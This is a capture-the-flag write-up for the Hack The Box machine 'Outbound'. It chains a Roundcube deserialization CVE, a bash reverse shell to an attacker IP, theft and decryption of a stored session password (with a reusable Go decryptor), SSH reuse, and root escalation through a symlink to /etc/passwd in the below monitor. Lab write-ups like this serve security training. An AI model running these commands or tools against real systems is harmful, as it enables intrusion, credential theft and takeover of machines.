HTB Outbound

Lee Wei Xuan

Executive Summary

This is a Hack The Box machine writeup for Outbound. In this machine, I used nmap to discover details about the target IP address, identified a CVE affecting the Roundcube webmail application (CVE-2025-49113) and used it to get a shell as www-data, pulled the database credentials and des_key from the Roundcube configuration, extracted an encrypted IMAP password from the session table and decrypted it, gained SSH access as jacob to retrieve the user flag, and escalated to root through CVE-2025-27591 in the below monitoring tool for the root flag.

Discovery

Nmap Scanning

I was given an IP address: 10.10.11.77.

I ran nmap with default scripts and version detection against the host:

nmap -sC -sV -Pn 10.10.11.77

Command Breakdown:

  • -sC: Runs the default NSE (Nmap Scripting Engine) script set. These scripts enumerate detected services and collect extra information such as banners, HTTP titles and SSH host keys; they are discovery scripts, not the vuln category, so this is not a vulnerability scan.
  • -sV: Enables version detection. Probes open ports to determine service/version info (what software is running and its version).
  • -Pn: Treats all hosts as online, skipping host discovery. This bypasses ping probes and assumes the target is up, useful when ICMP is blocked.
┌──(global_venv)─(w_11㉿kali)-[~]
└─$ nmap -sC -sV -Pn 10.10.11.77
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-03 02:10 +08
Nmap scan report for 10.10.11.77
Host is up (0.42s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_ 256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open http nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://mail.outbound.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.97 seconds

Adding Hosts Entry

The web server redirects to http://mail.outbound.htb/, which nmap could not follow because the name does not resolve.

I added the name to /etc/hosts so that mail.outbound.htb (and the bare domain) resolve to 10.10.11.77:

sudo sh -c 'echo "10.10.11.77 mail.outbound.htb outbound.htb" >> /etc/hosts'

Exploitation

Identifying Roundcube Webmail

After visiting the site and signing in with the credentials provided for the box (tyler / LhKL1o9Nm3X2), we can see the webmail interface.

(Screenshot: Roundcube webmail interface)

I inspected all the functions in the webmail and found the version in the “About” dialog.

(Screenshot: About dialog showing Roundcube Webmail 1.6.10)

Finding CVE-2025-49113

I searched for vulnerabilities affecting this version and found CVE-2025-49113.

According to the advisory, “Affected Versions: All versions prior to 1.5.10, 1.6.11”, so our Roundcube Webmail 1.6.10 is affected. The bug is a PHP object deserialization in program/actions/settings/upload.php, reachable because the _from request parameter is not validated. It is only exploitable by an authenticated user, which is why the credentials handed out for this box matter.

Exploiting the Vulnerability

After reading through the disclosure blog, I found a public exploit script at https://github.com/fearsoff-org/CVE-2025-49113 that targets unpatched installations. It takes the target URL, a valid login (the bug is post-authentication) and the command to execute on the server.

I cloned the repo and prepared to run the exploit script.

Before running the script, set up a netcat listener:

nc -nlvp 4444

Then run the exploit, pointing the reverse shell at the attacking machine (10.10.14.240):

php CVE-2025-49113.php http://mail.outbound.htb tyler LhKL1o9Nm3X2 'bash -c "bash -i >& /dev/tcp/10.10.14.240/4444 0>&1"'

Gaining Initial Access

We successfully gained access to the server:

┌──(global_venv)─(w_11㉿kali)-[~]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.240] from (UNKNOWN) [10.10.11.77] 37810
bash: cannot set terminal process group (257): Inappropriate ioctl for device
bash: no job control in this shell
www-data@mail:/var/www/html/roundcube/public_html$ ls
ls
index.php
plugins
program
roundcube
skins
www-data@mail:/var/www/html/roundcube/public_html$ cat index.php
cat index.php
<?php

/*
+-----------------------------------------------------------------------+
| Roundcube Webmail IMAP Client |
| Version 1.6.10 |
| |
| Copyright (C) The Roundcube Dev Team |
| |
| Licensed under the GNU General Public License version 3 or |
| any later version with exceptions for skins & plugins. |
| See the README file for a full license statement. |
| |
| PURPOSE: |
| This is the public entry point for all HTTP requests to the |
| Roundcube webmail application. |
+-----------------------------------------------------------------------+
| Author: Thomas Bruederli <roundcube@gmail.com> |
| Author: Aleksander Machniak <alec@alec.pl> |
+-----------------------------------------------------------------------+
*/

define('INSTALL_PATH', realpath(__DIR__ . '/..') . '/');

// include index.php from application root directory
include INSTALL_PATH . 'index.php';
www-data@mail:/var/www/html/roundcube/public_html$

Enumeration

Exploring the File System

We can see that there are several files inside. The Roundcube install root (here public_html/roundcube) has a config/ directory holding the site-specific settings, which is where credentials usually end up, so let me navigate there:

www-data@mail:/var/www/html/roundcube/public_html$ ls
index.php
plugins
program
roundcube
skins
www-data@mail:/var/www/html/roundcube/public_html$ cd roundcube

www-data@mail:/var/www/html/roundcube/public_html/roundcube$ ls
CHANGELOG.md
INSTALL
LICENSE
README.md
SECURITY.md
SQL
UPGRADING
bin
composer.json
composer.lock
config
index.php
logs
plugins
program
public_html
skins
temp
vendor
www-data@mail:/var/www/html/roundcube/public_html/roundcube$ cd config/

www-data@mail:/var/www/html/roundcube/public_html/roundcube/config$ ls
config.inc.php
config.inc.php.sample
defaults.inc.php
mimetypes.php

Finding Configuration Files

I opened config.inc.php to look for sensitive information:

www-data@mail:/var/www/html/roundcube/public_html/roundcube/config$ cat config.inc.php
<?php

/*
+-----------------------------------------------------------------------+
| Local configuration for the Roundcube Webmail installation. |
| |
| This is a sample configuration file only containing the minimum |
| setup required for a functional installation. Copy more options |
| from defaults.inc.php to this file to override the defaults. |
| |
| This file is part of the Roundcube Webmail client |
| Copyright (C) The Roundcube Dev Team |
| |
| Licensed under the GNU General Public License version 3 or |
| any later version with exceptions for skins & plugins. |
| See the README file for a full license statement. |
+-----------------------------------------------------------------------+
*/

$config = [];

// Database connection string (DSN) for read+write operations
// Format (compatible with PEAR MDB2): db_provider://user:password@host/database
// Currently supported db_providers: mysql, pgsql, sqlite, mssql, sqlsrv, oracle
// For examples see http://pear.php.net/manual/en/package.database.mdb2.intro-dsn.php
// NOTE: for SQLite use absolute path (Linux): 'sqlite:////full/path/to/sqlite.db?mode=0646'
// or (Windows): 'sqlite:///C:/full/path/to/sqlite.db'
$config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube';

// IMAP host chosen to perform the log-in.
// See defaults.inc.php for the option description.
$config['imap_host'] = 'localhost:143';

// SMTP server host (for sending mails).
// See defaults.inc.php for the option description.
$config['smtp_host'] = 'localhost:587';

// SMTP username (if required) if you use %u as the username Roundcube
// will use the current username for login
$config['smtp_user'] = '%u';

// SMTP password (if required) if you use %p as the password Roundcube
// will use the current user's password for login
$config['smtp_pass'] = '%p';

// provide an URL where a user can get support for this Roundcube installation
// PLEASE DO NOT LINK TO THE ROUNDCUBE.NET WEBSITE HERE!
$config['support_url'] = '';

// Name your service. This is displayed on the login screen and in the window title
$config['product_name'] = 'Roundcube Webmail';

// This key is used to encrypt the users imap password which is stored
// in the session record. For the default cipher method it must be
// exactly 24 characters long.
// YOUR KEY MUST BE DIFFERENT THAN THE SAMPLE VALUE FOR SECURITY REASONS
$config['des_key'] = 'rcmail-!24ByteDESkey*Str';

// List of active plugins (in plugins/ directory)
$config['plugins'] = [
'archive',
'zipdownload',
];

// skin name: folder from skins/
$config['skin'] = 'elastic';
$config['default_host'] = 'localhost';
$config['smtp_server'] = 'localhost';

Key findings:

  • Database credentials: mysql://roundcube:RCDBPass2025@localhost/roundcube (user roundcube, password RCDBPass2025, database roundcube)
  • des_key: rcmail-!24ByteDESkey*Str. Roundcube uses this 24-byte key (DES-EDE3-CBC by default) to encrypt the logged-in user's IMAP password before storing it in the session record. It is still the sample value from config.inc.php.sample, despite the warning in the comment above it.

Accessing the MySQL Database

The DSN above tells us that the backend is MySQL on localhost, with user roundcube, password RCDBPass2025 and database roundcube. From the www-data shell we can connect with those credentials:

mysql -u roundcube -pRCDBPass2025 roundcube

Extracting User Data

Once connected to the database, I queried the users table for accounts and the session table for stored session records:

USE roundcube;
SELECT * FROM users;
SELECT * FROM session;

User table results:

user_id username        mail_host       created last_login      failed_login    failed_login_counter    language        preferences
1 jacob localhost 2025-06-07 13:55:18 2025-06-11 07:52:49 2025-06-11 07:51:32 1 en_US a:1:{s:11:"client_hash";s:16:"hpLLqLwmqbyihpi7";}
2 mel localhost 2025-06-08 12:04:51 2025-06-08 13:29:05 NULL NULL en_US a:1:{s:11:"client_hash";s:16:"GCrPGMkZvbsnc3xv";}
3 tyler localhost 2025-06-08 13:28:55 2025-10-02 19:12:19 2025-06-11 07:51:22 1 en_US a:2:{s:11:"client_hash";s:16:"AB3l7IenOCdOe3Q8";i:0;b:0;}

Here we see three accounts. jacob (user_id 1) is the oldest, created 2025-06-07, and the session table turned out to hold a record for him, so that is where to look next.

Finding the Encrypted Password

The session table has four columns: sess_id, changed, ip and vars. vars is the serialized session, base64-encoded, and that is where Roundcube keeps the logged-in user's encrypted IMAP password. The row for jacob:

6a5ktqih5uca6lj8vrmgh9v0oh      2025-06-08 15:46:40     172.17.0.1      <base64 vars value omitted here>

Password Decryption

Decoding the Session Data

I used CyberChef to Base64-decode the vars value. The result is in PHP's session_encode() format (name|value records in serialize() syntax), and part way through it is the stored IMAP password. An excerpt of the decoded output:

language|s:5:"en_US";imap_namespace|a:4:{s:8:"personal";a:1:{i:0;a:2:{i:0;s:0:"";i:1;s:1:"/";}}s:5:"other";N;s:6:"shared";N;s:10:"prefix_out";s:0:"";}imap_delimiter|s:1:"/";imap_list_conf|a:2:{i:0;N;i:1;a:0:{}}user_id|i:1;username|s:5:"jacob";storage_host|s:9:"localhost";storage_port|i:143;storage_ssl|b:0;password|s:32:"L7Rv00A8TuwJAr67kITxxcSgnIk25Am/";login_time|i:1749397119;timezone|s:13:"Europe/London";STORAGE_SPECIAL-USE|b:1;auth_secret|s:26:"DpYqv6maI9HxDL5GhcCd8JaQQW";request_token|s:32:"TIsOaABA1zHSXZOBpH6up5XFyayNRHaw";task|s:4:"mail";skin_config|a:7:{s:17:"supported_layouts";a:1:{i:0;s:10:"widescreen";}s:22:"jquery_ui_colors_theme";s:9:"bootstrap";s:18:"embed_css_location";s:17:"/styles/embed.css";s:19:"editor_css_location";s:17:"/styles/embed.css";s:17:"dark_mode_support";b:1;s:26:"media_browser_css_location";s:4:"none";s:21:"additional_logo_types";a:3:{i:0;s:4:"dark";i:1;s:5:"small";i:2;s:10:"small-dark";}}imap_host|s:9:"localhost";page|i:1;mbox|s:5:"INBOX";sort_col|s:0:"";sort_order|s:4:"DESC";STORAGE_THREAD|a:3:{i:0;s:10:"REFERENCES";i:1;s:4:"REFS";i:2;s:14:"ORDEREDSUBJECT";}STORAGE_QUOTA|b:0;STORAGE_LIST-EXTENDED|b:1;list_attrib|a:6:{s:4:"name";s:8:"messages";s:2:"id";s:11:"messagelist";s:5:"class";s:42:"listing messagelist sortheader fixedheader";s:15:"aria-labelledby";s:22:"aria-label-messagelist";s:9:"data-list";s:12:"message_list";s:14:"data-label-msg";s:18:"The list is empty.";}unseen_count|a:2:{s:5:"INBOX";i:2;s:5:"Trash";i:0;}folders|a:1:{s:5:"INBOX";a:2:{s:3:"cnt";i:2;s:6:"maxuid";i:3;}}list_mod_seq|s:2:"10";

Aha! We found the encrypted password:

password|s:32:"L7Rv00A8TuwJAr67kITxxcSgnIk25Am/"

Method 1: Using Roundcube's Decrypt Script

The value was produced by Roundcube's own rcube::encrypt() using des_key, and Roundcube ships a helper for the reverse, bin/decrypt.sh, in the installation root. It loads the installation's config.inc.php to get the key, so run it on the target from the www-data shell (from the bin/ directory here):

php decrypt.sh "L7Rv00A8TuwJAr67kITxxcSgnIk25Am/"

Decrypted password:

595mO8DmwGeD

Method 2: Using CyberChef (Alternative)

The same decryption can be done by hand in CyberChef, which is more work but shows what the script does. Roundcube's default cipher_method is DES-EDE3-CBC, and the stored value is base64(IV || ciphertext) with an 8-byte IV.

Step 1: Paste the encrypted password into CyberChef, Base64-decode it and view it as hex. The 24 bytes are an 8-byte IV followed by 16 bytes of ciphertext (two 3DES blocks):

(Screenshot: CyberChef, From Base64 then To Hex)

Step 2: Use the first 8 bytes as the IV and the remaining 16 bytes as the input to Triple DES Decrypt in CBC mode, with the 24-byte key we found earlier (rcmail-!24ByteDESkey*Str, entered as text rather than hex). The plaintext is PKCS#7-padded; if the recipe does not strip the padding, discard the trailing bytes:

(Screenshot: CyberChef Triple DES Decrypt with key and IV set)

Result: We get the same password:

595mO8DmwGeD
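Both methods above perform the same computation, and the session-decoding step before them is just string parsing. The following Go program is an added example (mine, not code from this page, the exploit repository or Roundcube) that does both ends: sessionPassword pulls the password record out of a decoded vars value, and roundcubeDecrypt reverses rcube::encrypt() by base64-decoding, splitting off the 8-byte IV, running DES-EDE3-CBC with des_key and stripping the PKCS#7 padding, refusing to return anything when the padding is wrong so that a bad key is reported instead of producing garbage. The vars fragment in main() is constructed from the decoded output shown above; the key and the ciphertext are the ones recovered from the target, and the function names are my own.

```go
package main

import (
	"bytes"
	"crypto/cipher"
	"crypto/des"
	"encoding/base64"
	"errors"
	"fmt"
	"regexp"
)

// roundcubeDecrypt reverses rcube::encrypt(): the stored value is
// base64(IV || DES-EDE3-CBC(des_key, PKCS#7(plaintext))) with an 8-byte IV.
// Unlike a raw openssl call it checks the padding, so a wrong des_key is
// reported as an error instead of coming back as 16 bytes of garbage.
func roundcubeDecrypt(desKey, blob string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(blob)
	if err != nil {
		return "", fmt.Errorf("not base64: %w", err)
	}
	// des_key must be exactly 24 bytes, as the comment in config.inc.php says.
	block, err := des.NewTripleDESCipher([]byte(desKey))
	if err != nil {
		return "", err
	}
	bs := block.BlockSize() // 8 for 3DES
	if len(raw) < 2*bs || len(raw)%bs != 0 {
		return "", errors.New("blob too short or not block-aligned")
	}
	iv, ct := raw[:bs], raw[bs:]
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	// openssl_decrypt() strips PKCS#7 padding on the PHP side; do the same here.
	n := int(pt[len(pt)-1])
	if n < 1 || n > bs || !bytes.Equal(pt[len(pt)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return "", errors.New("invalid padding: wrong des_key or corrupted ciphertext")
	}
	return string(pt[:len(pt)-n]), nil
}

// Roundcube writes the session with PHP's session_encode() format, a run of
// name|<serialize()d value> records, so the password is stored as
// password|s:<len>:"<base64 blob>"; somewhere inside the decoded vars column.
var passwordRe = regexp.MustCompile(`(?:^|;)password\|s:\d+:"([^"]*)";`)

// sessionPassword returns the still-encrypted password from a decoded vars value.
func sessionPassword(vars string) (string, error) {
	m := passwordRe.FindStringSubmatch(vars)
	if m == nil {
		return "", errors.New("no password record in session vars")
	}
	return m[1], nil
}

func main() {
	// Constructed sample in the shape of the decoded vars column shown above,
	// carrying the ciphertext found on the target for jacob.
	vars := `user_id|i:1;username|s:5:"jacob";storage_host|s:9:"localhost";password|s:32:"L7Rv00A8TuwJAr67kITxxcSgnIk25Am/";login_time|i:1749397119;`
	desKey := "rcmail-!24ByteDESkey*Str" // from config.inc.php on the target

	enc, err := sessionPassword(vars)
	if err != nil {
		panic(err)
	}
	pw, err := roundcubeDecrypt(desKey, enc)
	if err != nil {
		panic(err)
	}
	fmt.Printf("jacob's IMAP password: %s\n", pw)

	// With any other key the padding check fails closed, which is the
	// behaviour you want when trying candidate keys against a stolen session.
	if _, err := roundcubeDecrypt("000000000000000000000000", enc); err != nil {
		fmt.Println("wrong key:", err)
	}
}
```

Run it with go run as is. To reuse it against another installation, feed it the des_key from that installation's config.inc.php and the vars value from its session table; if config.inc.php overrides cipher_method with something other than DES-EDE3-CBC, the cipher and IV length change accordingly. The padding check is what tells you immediately that a candidate key is wrong.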

User Access

SSH Login as Jacob

After that, I signed in to SSH using the username jacob and the password we just decrypted:

┌──(global_venv)─(w_11㉿kali)-[~]
└─$ ssh jacob@10.10.11.77
The authenticity of host '10.10.11.77 (10.10.11.77)' can't be established.
ED25519 key fingerprint is SHA256:OZNUeTZ9jastNKKQ1tFXatbeOZzSFg5Dt7nhwhjorR0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.77' (ED25519) to the list of known hosts.
jacob@10.10.11.77's password:
Welcome to Ubuntu 24.04.2 LTS (GNU/Linux 6.8.0-63-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro

System information as of Thu Oct 2 07:27:26 PM UTC 2025

System load: 0.1 Processes: 255
Usage of /: 74.5% of 6.73GB Users logged in: 0
Memory usage: 11% IPv4 address for eth0: 10.10.11.77
Swap usage: 0%


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Thu Oct 2 18:50:00 2025 from 10.10.14.18
jacob@outbound:~$

Capturing User Flag

After successfully logging in, I used cat on user.txt and found the first flag!

jacob@outbound:~$ ls
exploit.py exploit.sh snapshot_01759431961_01759431961.nQJACc user.txt
jacob@outbound:~$ cat user.txt
2e3eb95d86354c4825e2165a67654448

Flag One: 2e3eb95d86354c4825e2165a67654448


Privilege Escalation

Discovering Exploit Files

For the second flag, we need to gain root access to the server.

Interestingly, jacob's home directory already contains exploit.py and exploit.sh. These are not part of the box: on a shared HTB instance they are almost certainly leftovers from another player (the login banner above shows a previous SSH login from 10.10.14.18, not from my machine). Treat a script like this as untrusted input and read it before running it, because it executes with your session and whoever left it could have made it do anything.

Exploiting CVE-2025-27591

I decided to run the Python exploit that was conveniently available:

jacob@outbound:~$ python3 exploit.py
[*] Checking for CVE-2025-27591 vulnerability...
[+] /var/log/below is world-writable.
[!] /var/log/below/error_root.log is a regular file. Removing it...
[+] Symlink created: /var/log/below/error_root.log -> /etc/passwd
[+] Target is vulnerable.
[*] Starting exploitation...
[+] Wrote malicious passwd line to /tmp/attacker
[+] Symlink set: /var/log/below/error_root.log -> /etc/passwd
[*] Executing 'below record' as root to trigger logging...
Oct 02 20:04:11.074 DEBG Starting up!
Oct 02 20:04:11.074 ERRO
----------------- Detected unclean exit ---------------------
Error Message: Failed to acquire file lock on index file: /var/log/below/store/index_01759363200: EAGAIN: Try again
-------------------------------------------------------------
[+] 'below record' executed.
[*] Appending payload into /etc/passwd via symlink...
[+] Payload appended successfully.
[*] Attempting to switch to root shell via 'su attacker'...

Gaining Root Access

The exploit ran to completion and the final su attacker step gave me a root shell.

CVE-2025-27591 is a local privilege escalation in below, Meta's resource monitor. The exploit output shows the two things it relies on: /var/log/below is world-writable, and below, when run as root, opens its error log there by name and follows symlinks. So an unprivileged user can delete error_root.log, replace it with a symlink to /etc/passwd, and trigger below record as root (the script does this for you; running below as root must already be possible from jacob's account, which is worth confirming with sudo -l before relying on it). below's unclean exit over the store lock does not matter: logging had already been set up by then, and the script next appends a passwd line for a UID 0 user named attacker through the symlink. That append runs as jacob, so it only works because below had left its log file, now /etc/passwd, writable. su attacker then completes the escalation.
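As an added example (mine, not the exploit script's or below's code), here is a Go audit of the two preconditions the output above relied on, written from the defender's side: the log directory is world-writable, and an entry in it is a symlink pointing outside it. main() builds a throwaway directory standing in for /var/log/below, plants error_root.log -> /etc/passwd the way the exploit did, reports the findings, then shows that removing the link and tightening the mode to 0755 clears them. The temporary directory, the file names and the function names are constructed for the demonstration; it never touches the real /var/log/below.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// Finding is one reason a directory that a root process logs into is unsafe.
// The escalation above needed both at once: the directory was writable by an
// unprivileged user, and the file root opened for writing was a planted symlink.
type Finding struct {
	Path   string
	Reason string
}

// auditLogDir is the defender-side twin of the exploit's own pre-check: it flags
// a world-writable directory and any entry that is a symlink resolving outside
// the directory (error_root.log -> /etc/passwd in the output above).
func auditLogDir(dir string) ([]Finding, error) {
	absDir, err := filepath.Abs(dir)
	if err != nil {
		return nil, err
	}
	st, err := os.Stat(absDir)
	if err != nil {
		return nil, err
	}
	if !st.IsDir() {
		return nil, fmt.Errorf("%s is not a directory", absDir)
	}
	var findings []Finding
	if st.Mode().Perm()&0o002 != 0 {
		findings = append(findings, Finding{absDir, "directory is world-writable"})
	}
	entries, err := os.ReadDir(absDir)
	if err != nil {
		return nil, err
	}
	for _, e := range entries {
		if e.Type()&os.ModeSymlink == 0 {
			continue // regular files and subdirectories are not the problem here
		}
		p := filepath.Join(absDir, e.Name())
		target, err := os.Readlink(p)
		if err != nil {
			return nil, err
		}
		if !filepath.IsAbs(target) {
			target = filepath.Join(absDir, target) // Join also collapses ../ components
		}
		if !strings.HasPrefix(filepath.Clean(target), absDir+string(filepath.Separator)) {
			findings = append(findings, Finding{p, "symlink escapes the log directory -> " + target})
		}
	}
	return findings, nil
}

// makeDemoDir builds a constructed stand-in for /var/log/below: a world-writable
// temporary directory holding the planted link and one benign log file.
// The caller removes it with os.RemoveAll when done.
func makeDemoDir() (string, error) {
	dir, err := os.MkdirTemp("", "below-audit")
	if err != nil {
		return "", err
	}
	steps := []error{
		os.Chmod(dir, 0o777),
		os.Symlink("/etc/passwd", filepath.Join(dir, "error_root.log")),
		os.WriteFile(filepath.Join(dir, "error_jacob.log"), []byte("benign\n"), 0o644),
	}
	for _, err := range steps {
		if err != nil {
			return "", err
		}
	}
	return dir, nil
}

// remediate undoes the two preconditions: drop the link, take away world-write.
func remediate(dir string) error {
	if err := os.Remove(filepath.Join(dir, "error_root.log")); err != nil {
		return err
	}
	return os.Chmod(dir, 0o755)
}

func main() {
	dir, err := makeDemoDir()
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(dir)

	findings, err := auditLogDir(dir)
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("%s: %s\n", f.Path, f.Reason)
	}
	if err := remediate(dir); err != nil {
		panic(err)
	}
	findings, _ = auditLogDir(dir)
	fmt.Printf("after remediation: %d findings\n", len(findings))
}
```

To check a real host, point auditLogDir at the actual directory (for example /var/log/below) as root; a non-empty result is the condition to fix before a root process is allowed to log there again. Tightening the mode removes the planting opportunity, but the durable fix is updating below to a release in which the log handling was corrected.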

Capturing Root Flag

After gaining root access, I located and read the root flag:

cat /root/root.txt

Flag Two: f164ba6f0d37293719d9fa86b8f95cc8


Summary

This machine involved:

  1. Reconnaissance: Using nmap to discover open ports and services
  2. Vulnerability Identification: Finding CVE-2025-49113 affecting Roundcube Webmail 1.6.10
  3. Initial Exploitation: Using the CVE exploit to gain www-data access
  4. Enumeration: Discovering database credentials and DES encryption keys in configuration files
  5. Password Extraction: Querying MySQL database to find encrypted passwords
  6. Decryption: Using Roundcube’s bin/decrypt.sh or CyberChef to reverse the 3DES (DES-EDE3-CBC) encryption of the stored session password
  7. User Access: SSH login as jacob using decrypted credentials
  8. Privilege Escalation: Exploiting CVE-2025-27591 for root access

Flags obtained:

  • User Flag: 2e3eb95d86354c4825e2165a67654448
  • Root Flag: f164ba6f0d37293719d9fa86b8f95cc8

  • Title: HTB Outbound
  • Author: Lee Wei Xuan
  • Created at: 2025-10-03 02:07:57
  • Updated at: 2025-10-09 09:35:28
  • Link: https://weixuan0110.github.io/2025/10/03/HTB-Outbound/
  • License: This work is licensed under CC BY-NC-SA 4.0.